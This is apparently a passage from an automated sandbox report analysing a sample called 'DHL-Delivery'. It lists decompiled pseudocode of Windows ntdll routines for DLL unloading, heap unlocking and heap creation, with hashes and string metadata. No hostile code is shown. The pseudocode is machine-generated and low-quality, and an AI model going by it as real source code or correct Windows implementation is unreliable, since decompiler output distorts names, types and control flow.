                        						} else {
                        							E1E0EFBE0(_t45, 0x1e1d1528);
                        							_t86 =  *((intOrPtr*)(_t105 + 4));
                        							_t33 = _t105 + 8; // -76
                        							_t100 = _t33;
                        							_t93 =  *(_t86 + 0x1c);
                        							_t70 =  *_t93;
                        							_v20 = _t70;
                        							__eflags = _t70 - _t100;
                        							if(_t70 != _t100) {
                        								_t112 = _v16;
                        								do {
                        									_t71 =  *_t112;
                        									_t93 = _t112;
                        									_t112 = _t71;
                        									__eflags = _t71 - _t100;
                        								} while (_t71 != _t100);
                        								_t110 = _v12;
                        							}
                        							 *_t93 =  *_t100;
                        							__eflags =  *(_t86 + 0x1c) - _t100;
                        							if(__eflags == 0) {
                        								asm("sbb eax, eax");
                        								_t80 =  ~(_t93 - _t100) & _t93;
                        								__eflags = _t80;
                        								 *(_t86 + 0x1c) = _t80;
                        							}
                        							_push( &_v8);
                        							E1E0FB8FF(_t86, _t86, 0, _t105, _t110, __eflags);
                        							E1E0EFAC0(_t86, _t105, 0x1e1d1528);
                        							__eflags = _v16;
                        							if(_v16 != 0) {
                        								E1E109F1C(_t86, 0);
                        							}
                        							_t45 = E1E0F4EC0( *0x1e1d0c20, 0, _t105);
                        							continue;
                        						}
                        					}
                        					_t106 =  *_t110;
                        					 *(_t110 + 0x20) = 0xfffffffe;
                        					if(_t106 == _t110) {
                        						L14:
                        						return _t45;
                        					} else {
                        						goto L10;
                        					}
                        					do {
                        						L10:
                        						_t85 =  *_t106;
                        						_t108 = _t106 + 0xffffffac;
                        						 *(_t108 + 0x34) =  *(_t108 + 0x34) | 0x00000002;
                        						E1E0EFBE0(_t45, 0x1e1d1528);
                        						E1E10AC2D(_t108, _t110);
                        						if(( *(_t108 + 0x34) & 0x00000080) != 0) {
                        							_t16 = _t108 + 0x74; // -140
                        							L1E10A2F0(_t85, _t108, _t110, "\@u", _t16);
                        							_t17 = _t108 + 0x68; // -152
                        							L1E10A2F0(_t85, _t108, _t110, "(0u", _t17);
                        							 *(_t108 + 0x20) =  *(_t108 + 0x20) & 0x00000000;
                        						}
                        						E1E0EFAC0(_t85, _t108, 0x1e1d1528);
                        						if( *0x1e1d0c1c != 0) {
                        							E1E1167FD(_t108);
                        						}
                        						_t45 = E1E0FB42D(_t85, _t108, _t110);
                        						_t106 = _t85;
                        					} while (_t85 != _t110);
                        					goto L14;
                        				}
                        				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
                        					goto L4;
                        				}
                        				if( *((intOrPtr*)(__ecx + 0x20)) != 9) {
                        					goto L8;
                        				}
                        				goto L3;
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: (0u$LdrpUnloadNode$Unmapping DLL "%wZ"$\@u$minkernel\ntdll\ldrsnap.c
                        • API String ID: 3446177414-1134623788
                        • Opcode ID: 3e7c4e2f990ed449b21bfbafdaf302c9b4d4701f37f52298270a180da77b2f49
                        • Instruction ID: 2f5b8eba78e9f18e94f4e7bc555696b46609868b588d8dc45ff626ad390967f8
                        • Opcode Fuzzy Hash: 3e7c4e2f990ed449b21bfbafdaf302c9b4d4701f37f52298270a180da77b2f49
                        • Instruction Fuzzy Hash: 5D51F0767047829FC714DF24C994AAE77E2BBC4314F280B6DE5528B695DB30E9C4CB82
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 44%
                        			E1E10EFD0(void* __ecx, intOrPtr _a4) {
                        				signed int _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int* _t38;
                        				signed int* _t39;
                        				char _t40;
                        				intOrPtr _t45;
                        				intOrPtr _t50;
                        				signed int _t57;
                        				signed int _t61;
                        				signed int _t67;
                        				intOrPtr _t79;
                        				signed char* _t80;
                        				intOrPtr _t84;
                        				intOrPtr _t86;
                        				intOrPtr* _t88;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t86 = _a4;
                        				if( *((intOrPtr*)(_t86 + 8)) == 0xddeeddee) {
                        					E1E1A3C9F(_t86, 0, __ecx);
                        					L6:
                        					_t38 =  *( *[fs:0x30] + 0x50);
                        					if(_t38 != 0) {
                        						__eflags =  *_t38;
                        						if( *_t38 == 0) {
                        							goto L7;
                        						}
                        						_t39 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                        						L8:
                        						if( *_t39 != 0) {
                        							_t79 =  *[fs:0x30];
                        							__eflags =  *(_t79 + 0x240) & 0x00000001;
                        							if(( *(_t79 + 0x240) & 0x00000001) != 0) {
                        								E1E199B4F(_t86);
                        							}
                        						}
                        						_t40 = 1;
                        						L10:
                        						return _t40;
                        					}
                        					L7:
                        					_t39 = 0x7ffe0380;
                        					goto L8;
                        				}
                        				if(( *(_t86 + 0x44) & 0x01000000) != 0) {
                        					_t88 =  *0x1e1ce75c; // 0x0
                        					 *0x1e1d41e0(_t86);
                        					_t40 =  *_t88();
                        					goto L10;
                        				}
                        				if( *((intOrPtr*)(_t86 + 0x60)) != 0xeeffeeff) {
                        					_t45 =  *[fs:0x30];
                        					__eflags =  *(_t45 + 0xc);
                        					if( *(_t45 + 0xc) == 0) {
                        						_push("HEAP: ");
                        						E1E0DB1F0();
                        					} else {
                        						E1E0DB1F0("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E1E0DB1F0("Invalid heap signature for heap at %p", _t86);
                        					E1E0DB1F0(", passed to %s", "RtlUnlockHeap");
                        					_push("\n");
                        					E1E0DB1F0();
                        					_t50 =  *[fs:0x30];
                        					__eflags =  *((char*)(_t50 + 2));
                        					if( *((char*)(_t50 + 2)) != 0) {
                        						 *0x1e1cf3b8 = 1;
                        						asm("int3");
                        						 *0x1e1cf3b8 = 0;
                        					}
                        					_t40 = 0;
                        					goto L10;
                        				}
                        				if(( *(_t86 + 0x40) & 0x00000001) != 0) {
                        					goto L6;
                        				}
                        				_t84 =  *((intOrPtr*)(_t86 + 0xc8));
                        				 *((intOrPtr*)(_t86 + 0xe8)) =  *((intOrPtr*)(_t86 + 0xe8)) + 0xffff;
                        				_t13 = _t84 + 8;
                        				 *_t13 =  *((intOrPtr*)(_t84 + 8)) - 1;
                        				if( *_t13 != 0) {
                        					goto L6;
                        				}
                        				 *(_t84 + 0xc) =  *(_t84 + 0xc) & 0x00000000;
                        				_t80 = _t84 + 4;
                        				_t57 = 0xfffffffe;
                        				asm("lock cmpxchg [edx], ecx");
                        				_t67 = _t57;
                        				if(_t67 != 0xfffffffe) {
                        					__eflags =  *_t80 & 0x00000001;
                        					if(__eflags != 0) {
                        						_push(_t84);
                        						E1E177BF0(_t67, _t80, _t84, _t86, __eflags);
                        					}
                        					_t81 =  *(_t84 + 0x10);
                        					__eflags =  *(_t84 + 0x10);
                        					if( *(_t84 + 0x10) == 0) {
                        						_t81 = E1E11B32C(_t84, _t81);
                        					}
                        					while(1) {
                        						_v8 = _t67 & 0x00000002 | 0x00000001;
                        						_t61 = _t67;
                        						asm("lock cmpxchg [esi], ecx");
                        						__eflags = _t61 - _t67;
                        						if(_t61 == _t67) {
                        							break;
                        						}
                        						_t67 = _t61;
                        					}
                        					__eflags = _v8 & 0x00000002;
                        					_t86 = _a4;
                        					if((_v8 & 0x00000002) != 0) {
                        						E1E10204C(_t84, _t81);
                        					}
                        				}
                        				goto L6;
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                        • API String ID: 3446177414-3224558752
                        • Opcode ID: c0aae6d87779a548d2019ecb29380676b2591e828e8095ef25bf4a3737894f3f
                        • Instruction ID: 4768568fb939557338a9e5ebbd252424d1c90974d02bbe717472c1b97c336354
                        • Opcode Fuzzy Hash: c0aae6d87779a548d2019ecb29380676b2591e828e8095ef25bf4a3737894f3f
                        • Instruction Fuzzy Hash: 00416A39614781DFC312CB24C959B5AB7A6FF05720F208769F8168B785CB74B9C5C780
                        Uniqueness

                        Uniqueness Score: 100.00%

                        C-Code - Quality: 80%
                        			E1E104EE0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t409;
                        				signed int _t413;
                        				void* _t420;
                        				signed int _t430;
                        				intOrPtr _t432;
                        				void* _t434;
                        				void* _t435;
                        				signed int _t436;
                        				void* _t439;
                        				unsigned int _t445;
                        				intOrPtr* _t465;
                        				intOrPtr* _t467;
                        				intOrPtr* _t469;
                        				intOrPtr* _t471;
                        				void* _t497;
                        				void* _t499;
                        				signed int _t505;
                        				void* _t509;
                        				void* _t512;
                        				intOrPtr _t513;
                        				void* _t514;
                        				void* _t517;
                        				char* _t524;
                        				intOrPtr _t535;
                        				intOrPtr _t544;
                        				void* _t547;
                        				void* _t548;
                        				signed int _t549;
                        				void* _t552;
                        				signed int _t554;
                        				void* _t555;
                        				signed int _t560;
                        				signed int _t561;
                        				intOrPtr _t583;
                        				void* _t592;
                        				void* _t593;
                        				unsigned int _t597;
                        				void* _t599;
                        				void* _t601;
                        				signed int _t606;
                        				intOrPtr _t607;
                        				void* _t610;
                        				void* _t611;
                        				intOrPtr _t623;
                        				signed int _t638;
                        				void* _t646;
                        				signed int _t651;
                        				signed int _t652;
                        				signed int _t662;
                        				void* _t666;
                        				signed int _t671;
                        				signed char _t672;
                        				signed int _t673;
                        				void* _t681;
                        				void* _t682;
                        				signed char _t683;
                        				signed char _t687;
                        				void* _t700;
                        				void* _t701;
                        				void* _t702;
                        				short _t703;
                        				void* _t704;
                        				signed int _t706;
                        				signed int _t707;
                        				void* _t720;
                        				void* _t722;
                        				signed int _t723;
                        				signed int _t724;
                        				void* _t726;
                        				intOrPtr* _t732;
                        				void* _t733;
                        				void* _t734;
                        				void* _t736;
                        				intOrPtr _t740;
                        
                        				_push(0x114);
                        				_push(0x1e1b8dc0);
                        				E1E1343E0(__ebx, __edi, __esi);
                        				_t597 =  *(_t733 + 0x18);
                        				 *(_t733 - 0xb4) = _t597;
                        				_t671 =  *(_t733 + 8);
                        				 *(_t733 - 0xb0) = _t671;
                        				_t409 =  *(_t733 + 0xc);
                        				 *(_t733 - 0xb8) = _t409;
                        				 *(_t733 - 0xf4) = _t409;
                        				_t599 =  *(_t733 + 0x10);
                        				 *(_t733 - 0xd0) = _t599;
                        				_t720 =  *(_t733 + 0x14);
                        				 *(_t733 - 0xc4) = _t720;
                        				 *(_t733 - 0xe8) = _t597;
                        				_t700 =  *(_t733 + 0x1c);
                        				 *(_t733 - 0xd8) =  *( *[fs:0x30] + 0x68);
                        				 *(_t733 - 0xe4) = 0;
                        				 *(_t733 - 0xac) = 0;
                        				 *(_t733 - 0xbc) = 0;
                        				_t740 =  *0x1e1ce72c; // 0x0
                        				if(_t740 != 0) {
                        					__eflags =  *(_t733 - 0xb8);
                        					if( *(_t733 - 0xb8) != 0) {
                        						goto L1;
                        					}
                        					__eflags =  *(_t733 - 0xb4);
                        					if( *(_t733 - 0xb4) != 0) {
                        						goto L1;
                        					}
                        					_t732 =  *0x1e1ce744; // 0x0
                        					 *0x1e1d41e0(_t671, 0, _t599, _t720, 0, _t700);
                        					 *_t732();
                        					_t721 = 0;
                        					__eflags = 0;
                        					if(0 != 0) {
                        						L81:
                        						_t673 =  *(_t733 - 0xb4);
                        						L82:
                        						_t701 =  *(_t733 - 0xb8);
                        						_t413 = 0;
                        						L83:
                        						if(_t413 != 0) {
                        							__eflags = _t413 - _t673;
                        							if(__eflags != 0) {
                        								_push(_t413);
                        								E1E107450(0, _t701, _t721, __eflags);
                        							}
                        						}
                        						if( *(_t733 - 0xac) != 0) {
                        							__eflags = _t701;
                        							if(_t701 == 0) {
                        								 *(_t733 - 0xc0) = 0;
                        								E1E1068B3(_t733 - 0xac, _t733 - 0xc0, 0x8000);
                        							}
                        						}
                        						L86:
                        						return E1E134428(0, _t701, _t721);
                        					}
                        					__eflags = _t700 - 0xffffffff;
                        					if(_t700 != 0xffffffff) {
                        						L137:
                        						_t721 = 0;
                        						goto L81;
                        					}
                        					_t700 = 0;
                        					_t671 =  *(_t733 - 0xb0);
                        					_t599 =  *(_t733 - 0xd0);
                        				}
                        				L1:
                        				_t672 = _t671 & 0xf1ffffff;
                        				 *(_t733 - 0xb0) = _t672;
                        				_t721 = 0;
                        				if((_t672 & 0x00000100) != 0) {
                        					__eflags = _t672 & 0x00000002;
                        					if((_t672 & 0x00000002) == 0) {
                        						goto L81;
                        					}
                        					__eflags =  *(_t733 - 0xb8);
                        					if( *(_t733 - 0xb8) != 0) {
                        						goto L81;
                        					}
                        					__eflags = _t599;
                        					if(_t599 != 0) {
                        						goto L81;
                        					}
                        					__eflags =  *(_t733 - 0xc4);
                        					if( *(_t733 - 0xc4) != 0) {
                        						goto L81;
                        					}
                        					__eflags =  *(_t733 - 0xb4);
                        					if( *(_t733 - 0xb4) != 0) {
                        						goto L81;
                        					}
                        					__eflags = _t700;
                        					if(_t700 == 0) {
                        						L127:
                        						_t721 = _t733 - 0x4c;
                        						L3:
                        						if(_t721 != 0) {
                        							__eflags = _t721 - _t733 - 0x4c;
                        							if(_t721 == _t733 - 0x4c) {
                        								_t703 = 0x30;
                        								E1E1269F0(_t721, 0, _t703);
                        								 *_t721 = 1;
                        								 *((short*)(_t721 + 2)) = _t703;
                        								 *((intOrPtr*)(_t721 + 0xc)) = 1;
                        								_t310 = _t721 + 0x10;
                        								 *_t310 =  *(_t721 + 0x10) | 0xffffffff;
                        								__eflags =  *_t310;
                        							}
                        							_t420 = E1E19D268(_t721);
                        							_t702 =  *(_t733 - 0xd0);
                        							_t601 =  *(_t733 - 0xc4);
                        							__eflags = _t702;
                        							if(_t702 == 0) {
                        								_t702 = _t601;
                        							}
                        							__eflags = _t601 - _t702;
                        							if(_t601 > _t702) {
                        								_t601 = _t702;
                        							}
                        							_t721 = E1E1A34EF(E1E18AE34(_t420,  *(_t733 - 0xb0),  *(_t733 - 0xd8)), _t702, _t601, _t420, _t672);
                        							__eflags = _t721;
                        							if(_t721 == 0) {
                        								goto L81;
                        							} else {
                        								E1E102A1F(_t721, 0, 1, 0);
                        								__eflags =  *(_t721 + 0x14);
                        								if( *(_t721 + 0x14) != 0) {
                        									goto L81;
                        								}
                        								E1E1A3782(_t721);
                        								goto L137;
                        							}
                        						}
                        						if((_t672 & 0x10000000) != 0) {
                        							L7:
                        							_t722 = 0x30;
                        							E1E1269F0(_t733 - 0xa8, 0, _t722);
                        							_t736 = _t734 + 0xc;
                        							if(_t700 != 0) {
                        								 *((intOrPtr*)(_t733 - 4)) = 0;
                        								__eflags =  *_t700 - _t722;
                        								if( *_t700 == _t722) {
                        									_t662 = 0xc;
                        									memcpy(_t733 - 0xa8, _t700, _t662 << 2);
                        									_t736 = _t736 + 0xc;
                        								}
                        								 *((intOrPtr*)(_t733 - 4)) = 0xfffffffe;
                        							}
                        							_t606 =  *(_t733 - 0xd8);
                        							_t430 =  *(_t733 - 0xb0);
                        							if((_t606 & 0x00000010) != 0) {
                        								_t430 = _t430 | 0x00000020;
                        								 *(_t733 - 0xb0) = _t430;
                        							}
                        							if((_t606 & 0x00000020) != 0) {
                        								_t430 = _t430 | 0x00000040;
                        								 *(_t733 - 0xb0) = _t430;
                        							}
                        							if((_t606 & 0x00200000) != 0) {
                        								_t430 = _t430 | 0x00000080;
                        								 *(_t733 - 0xb0) = _t430;
                        							}
                        							if((_t606 & 0x00000040) != 0) {
                        								_t430 = _t430 | 0x40000000;
                        								 *(_t733 - 0xb0) = _t430;
                        							}
                        							if((0x00000080 & _t606) != 0) {
                        								_t430 = _t430 | 0x20000000;
                        								 *(_t733 - 0xb0) = _t430;
                        							}
                        							_t679 = 0x1000;
                        							if((0x00001000 & _t606) != 0) {
                        								 *(_t733 - 0xb0) = _t430 | 0x08000000;
                        							}
                        							_t607 =  *[fs:0x30];
                        							if( *((intOrPtr*)(_t733 - 0xa4)) == 0) {
                        								 *((intOrPtr*)(_t733 - 0xa4)) =  *((intOrPtr*)(_t607 + 0x78));
                        							}
                        							if( *((intOrPtr*)(_t733 - 0xa0)) == 0) {
                        								 *((intOrPtr*)(_t733 - 0xa0)) =  *((intOrPtr*)(_t607 + 0x7c));
                        							}
                        							if( *(_t733 - 0x9c) == 0) {
                        								 *(_t733 - 0x9c) =  *(_t607 + 0x84);
                        							}
                        							if( *(_t733 - 0x98) == 0) {
                        								 *(_t733 - 0x98) =  *(_t607 + 0x80);
                        							}
                        							_t432 =  *0x1e1d178c; // 0x7ffeffff
                        							if(_t432 == 0) {
                        								 *0x1e1d1790 = 0x10000;
                        								_push(0);
                        								_push(0x2c);
                        								_push(_t733 - 0x78);
                        								_push(0);
                        								_t434 = E1E120800();
                        								__eflags = _t434;
                        								if(_t434 < 0) {
                        									goto L137;
                        								}
                        								_t432 =  *((intOrPtr*)(_t733 - 0x58));
                        								 *0x1e1d178c = _t432;
                        								_t679 = 0x1000;
                        								goto L23;
                        							} else {
                        								L23:
                        								if( *((intOrPtr*)(_t733 - 0x94)) == 0) {
                        									 *((intOrPtr*)(_t733 - 0x94)) = _t432 -  *0x1e1d1790 - _t679;
                        								}
                        								if( *((intOrPtr*)(_t733 - 0x90)) != 0) {
                        									__eflags =  *((intOrPtr*)(_t733 - 0x90)) - 0x7f000;
                        									if( *((intOrPtr*)(_t733 - 0x90)) <= 0x7f000) {
                        										goto L27;
                        									}
                        									goto L26;
                        								} else {
                        									L26:
                        									 *((intOrPtr*)(_t733 - 0x90)) = 0x7f000;
                        									L27:
                        									_t435 =  *(_t733 - 0xc4);
                        									if(_t435 != 0) {
                        										_t679 = _t435 + 0x00000fff & 0xfffff000;
                        									}
                        									 *(_t733 - 0xc8) = _t679;
                        									_t704 =  *(_t733 - 0xd0);
                        									if(_t704 != 0) {
                        										_t609 = _t704 + 0x00000fff & 0xfffff000;
                        									} else {
                        										_t62 = _t679 + 0xffff; // 0x10fff
                        										_t609 = _t62 & 0xffff0000;
                        									}
                        									 *(_t733 - 0xc0) = _t609;
                        									_t723 = _t679;
                        									if(_t679 > _t609) {
                        										_t679 = _t609;
                        										 *(_t733 - 0xc8) = _t609;
                        										_t723 = _t609;
                        									}
                        									_t701 = _t723;
                        									_t436 =  *(_t733 - 0xb0);
                        									if((_t436 & 0x00000002) == 0 ||  *(_t733 - 0xb8) != 0) {
                        										 *(_t733 - 0xd8) = 0;
                        										_t723 = _t701;
                        									} else {
                        										 *(_t733 - 0xd8) = 0x1000;
                        										 *(_t733 - 0xe4) = 2;
                        										_t70 = _t609 - 0x1000; // 0xffff
                        										if(_t70 < _t723) {
                        											_t609 = _t609 + 0x00010fff & 0xffff0000;
                        											 *(_t733 - 0xc0) = _t609;
                        										}
                        										_t436 =  *(_t733 - 0xb0);
                        									}
                        									if(_t723 == 0 || _t609 == 0) {
                        										goto L137;
                        									} else {
                        										if((_t436 & 0x61000000) != 0) {
                        											__eflags = _t436 & 0x10000000;
                        											if((_t436 & 0x10000000) != 0) {
                        												goto L38;
                        											}
                        											_t721 = _t733 - 0xa8;
                        											E1E19B1F4(_t436,  *(_t733 - 0xb8), _t609, _t679,  *(_t733 - 0xb4), _t733 - 0xa8);
                        											goto L86;
                        										}
                        										L38:
                        										 *(_t733 - 0xd0) = 0x258;
                        										_t673 =  *(_t733 - 0xb4);
                        										if((_t436 & 0x00000001) != 0) {
                        											__eflags = _t673;
                        											if(_t673 == 0) {
                        												L41:
                        												_t701 =  *(_t733 - 0xb8);
                        												if(_t701 != 0) {
                        													__eflags =  *(_t733 - 0x84);
                        													if( *(_t733 - 0x84) != 0) {
                        														_t681 =  *(_t733 - 0x8c);
                        														__eflags = _t681;
                        														if(_t681 == 0) {
                        															L168:
                        															_t413 =  *(_t733 - 0xbc);
                        															_t721 = 0;
                        															_t673 =  *(_t733 - 0xb4);
                        															goto L83;
                        														}
                        														_t610 =  *(_t733 - 0x88);
                        														__eflags = _t610;
                        														if(_t610 == 0) {
                        															goto L168;
                        														}
                        														__eflags = _t681 - _t610;
                        														if(_t681 > _t610) {
                        															goto L168;
                        														}
                        														__eflags = _t436 & 0x00000002;
                        														if((_t436 & 0x00000002) != 0) {
                        															goto L168;
                        														}
                        														 *(_t733 - 0xcc) = _t701;
                        														 *(_t733 - 0xc4) = _t701 + _t681;
                        														 *(_t733 - 0xc0) = _t610;
                        														E1E1269F0(_t701, 0, 0x1000);
                        														_t736 = _t736 + 0xc;
                        														L107:
                        														_t724 =  *(_t733 - 0xb0);
                        														L99:
                        														 *(_t733 - 0xe4) =  *(_t733 - 0xe4) | 0x00000001;
                        														_t682 = _t701;
                        														 *(_t733 - 0xac) = _t682;
                        														_t706 = _t724 & 0x00040000;
                        														_t611 =  *(_t733 - 0xc4);
                        														_t439 =  *(_t733 - 0xcc);
                        														L48:
                        														if(_t439 != _t611) {
                        															L54:
                        															_t707 = _t682 + 0x258;
                        															if(( *( *[fs:0x30] + 0x68) & 0x00000800) != 0) {
                        																 *( *(_t733 - 0xac) + 0xbc) = _t707 + 0x00000007 & 0xfffffff8;
                        																 *(_t733 - 0xd0) =  *(_t733 - 0xd0) + 0x60c;
                        																_t707 =  *( *(_t733 - 0xac) + 0xbc) + 0x60c;
                        																 *(_t733 - 0xb0) =  *(_t733 - 0xb0) | 0x04000000;
                        																_t724 =  *(_t733 - 0xb0);
                        															}
                        															_t445 =  *(_t733 - 0xd0) + 0x00000007 & 0xfffffff8;
                        															 *(_t733 - 0xe8) = _t445;
                        															 *( *(_t733 - 0xac)) = _t445 >> 3;
                        															 *((char*)( *(_t733 - 0xac) + 2)) = 1;
                        															 *((char*)( *(_t733 - 0xac) + 7)) = 1;
                        															 *((intOrPtr*)( *(_t733 - 0xac) + 0x60)) = 0xeeffeeff;
                        															 *( *(_t733 - 0xac) + 0x40) = _t724 & 0xefffffff;
                        															 *((intOrPtr*)( *(_t733 - 0xac) + 0x58)) = 0;
                        															E1E1269F0( *(_t733 - 0xac) + 0x1f4, 0, 0x5c);
                        															E1E1058C5( *(_t733 - 0xac));
                        															 *((intOrPtr*)( *(_t733 - 0xac) + 0x234)) = 1;
                        															_t726 =  *(_t733 - 0xac);
                        															if(( *(_t726 + 0x40) & 0x08000000) != 0) {
                        																 *(_t726 + 0x58) = E1E197C99(0x1e19a140) & 0x0000ffff;
                        																 *( *(_t733 - 0xac) + 0x40) =  *( *(_t733 - 0xac) + 0x40) & 0xffffffbf;
                        																_t726 =  *(_t733 - 0xac);
                        															}
                        															_t683 =  *(_t733 - 0xb0);
                        															 *(_t726 + 0x44) = _t683 & 0x6001007d;
                        															 *((short*)( *(_t733 - 0xac) + 0x7e)) = _t707 -  *(_t733 - 0xac);
                        															 *((intOrPtr*)( *(_t733 - 0xac) + 0x80)) = 0;
                        															_t465 =  *(_t733 - 0xac) + 0xc0;
                        															 *((intOrPtr*)(_t465 + 4)) = _t465;
                        															 *_t465 = _t465;
                        															_t467 =  *(_t733 - 0xac) + 0x9c;
                        															 *((intOrPtr*)(_t467 + 4)) = _t467;
                        															 *_t467 = _t467;
                        															_t469 =  *(_t733 - 0xac) + 0xa4;
                        															 *((intOrPtr*)(_t469 + 4)) = _t469;
                        															 *_t469 = _t469;
                        															_t471 =  *(_t733 - 0xac) + 0x8c;
                        															 *((intOrPtr*)(_t471 + 4)) = _t471;
                        															 *_t471 = _t471;
                        															if( *(_t733 - 0xbc) != 0 || (_t683 & 0x00000001) != 0) {
                        																L60:
                        																 *( *(_t733 - 0xac) + 0xc8) =  *(_t733 - 0xbc);
                        																 *( *(_t733 - 0xac) + 0x48) =  *( *(_t733 - 0xac) + 0x48) | 0x80000000;
                        																if(E1E1061FC( *(_t733 - 0xac),  *(_t733 - 0xac),  *(_t733 - 0xe8) + 0x238,  *(_t733 - 0xbc),  *(_t733 - 0xe4),  *(_t733 - 0xcc),  *(_t733 - 0xc4),  *(_t733 - 0xcc) -  *(_t733 - 0xd8) +  *(_t733 - 0xc0)) == 0) {
                        																	L167:
                        																	_t701 =  *(_t733 - 0xb8);
                        																	goto L168;
                        																}
                        																if( *(_t733 - 0xb8) != 0) {
                        																	E1E1269F0(_t707, 0, 0x80);
                        																}
                        																 *((intOrPtr*)(_t707 + 4)) = 0x80;
                        																_t623 = _t707 + 0x24;
                        																 *((intOrPtr*)(_t707 + 0x1c)) = _t623;
                        																 *(_t707 + 0x18) =  *(_t733 - 0xac) + 0xc0;
                        																 *((intOrPtr*)(_t707 + 0x20)) = _t623 + 0x10;
                        																E1E105CF9( *(_t733 - 0xac), _t707);
                        																 *((short*)( *(_t733 - 0xac) + 0x7c)) = 0;
                        																 *((intOrPtr*)( *(_t733 - 0xac) + 0x64)) =  *((intOrPtr*)(_t733 - 0xa4));
                        																 *((intOrPtr*)( *(_t733 - 0xac) + 0x68)) =  *((intOrPtr*)(_t733 - 0xa0));
                        																 *( *(_t733 - 0xac) + 0x6c) =  *(_t733 - 0x9c) >> 3;
                        																 *( *(_t733 - 0xac) + 0x70) =  *(_t733 - 0x98) >> 3;
                        																 *((intOrPtr*)( *(_t733 - 0xac) + 0x78)) =  *((intOrPtr*)(_t733 - 0x94));
                        																 *( *(_t733 - 0xac) + 0x5c) =  *((intOrPtr*)(_t733 - 0x90)) + 7 >> 3;
                        																 *( *(_t733 - 0xac) + 0xcc) =  *(_t733 - 0x84) ^  *0x1e1d1ac8;
                        																 *((intOrPtr*)( *(_t733 - 0xac) + 0x250)) = 4;
                        																 *((intOrPtr*)( *(_t733 - 0xac) + 0x254)) = 0xfe000;
                        																_t687 = 1;
                        																if(( *0x1e1d1784 & 1) != 0) {
                        																	 *( *(_t733 - 0xac) + 0x48) = 1;
                        																}
                        																_t638 =  *(_t733 - 0xb0);
                        																_t497 =  *(_t733 - 0xac);
                        																if((_t638 & 0x00010000) != 0) {
                        																	 *((intOrPtr*)(_t497 + 0x94)) = 0x17;
                        																	 *((intOrPtr*)( *(_t733 - 0xac) + 0x98)) = 0xfffffff0;
                        																} else {
                        																	 *((intOrPtr*)(_t497 + 0x94)) = 0xf;
                        																	 *((intOrPtr*)( *(_t733 - 0xac) + 0x98)) = 0xfffffff8;
                        																}
                        																_t499 =  *(_t733 - 0xac);
                        																if(( *(_t499 + 0x40) & 0x00000020) != 0) {
                        																	 *((intOrPtr*)(_t499 + 0x94)) =  *((intOrPtr*)(_t499 + 0x94)) + 8;
                        																	_t499 =  *(_t733 - 0xac);
                        																}
                        																 *((intOrPtr*)(_t499 + 0xe4)) = 0;
                        																 *((short*)( *(_t733 - 0xac) + 0xe8)) = 0;
                        																 *((char*)( *(_t733 - 0xac) + 0xea)) = 0;
                        																 *((char*)( *(_t733 - 0xac) + 0xeb)) = 0;
                        																 *((intOrPtr*)( *(_t733 - 0xac) + 0xb8)) = 0;
                        																_t505 = _t638 & 0x00000003;
                        																_t639 = _t638 & 0xffffff00 | _t505 == 0x00000002;
                        																if(((_t505 & 0xffffff00 | ( *0x1e1d1784 & _t687) == 0x00000000) & (_t638 & 0xffffff00 | _t505 == 0x00000002)) == 0) {
                        																	L69:
                        																	E1E102A1F( *(_t733 - 0xac), 0, _t687, 0);
                        																	if( *((intOrPtr*)( *(_t733 - 0xac) + 0x7c)) == 0) {
                        																		goto L167;
                        																	}
                        																	_t509 = E1E0F5440();
                        																	_t728 = 0x7ffe0380;
                        																	if(_t509 != 0) {
                        																		_t512 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        																	} else {
                        																		_t512 = 0x7ffe0380;
                        																	}
                        																	if( *_t512 != 0) {
                        																		_t513 =  *[fs:0x30];
                        																		__eflags =  *(_t513 + 0x240) & 0x00000001;
                        																		if(( *(_t513 + 0x240) & 0x00000001) == 0) {
                        																			goto L73;
                        																		}
                        																		__eflags = E1E0F5440();
                        																		if(__eflags != 0) {
                        																			_t728 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        																			__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        																		}
                        																		_t729 =  *(_t733 - 0xb0);
                        																		E1E199503(0,  *(_t733 - 0xac),  *(_t733 - 0xb0), 0, __eflags,  *(_t733 - 0xc0),  *(_t733 - 0xc8),  *_t728 & 0x000000ff);
                        																		goto L74;
                        																	} else {
                        																		L73:
                        																		_t729 =  *(_t733 - 0xb0);
                        																		L74:
                        																		_t514 = E1E0F5440();
                        																		_t710 = 0x7ffe038a;
                        																		if(_t514 != 0) {
                        																			_t517 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        																		} else {
                        																			_t517 = 0x7ffe038a;
                        																		}
                        																		if( *_t517 != 0) {
                        																			__eflags = E1E0F5440();
                        																			if(__eflags != 0) {
                        																				_t710 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        																				__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        																			}
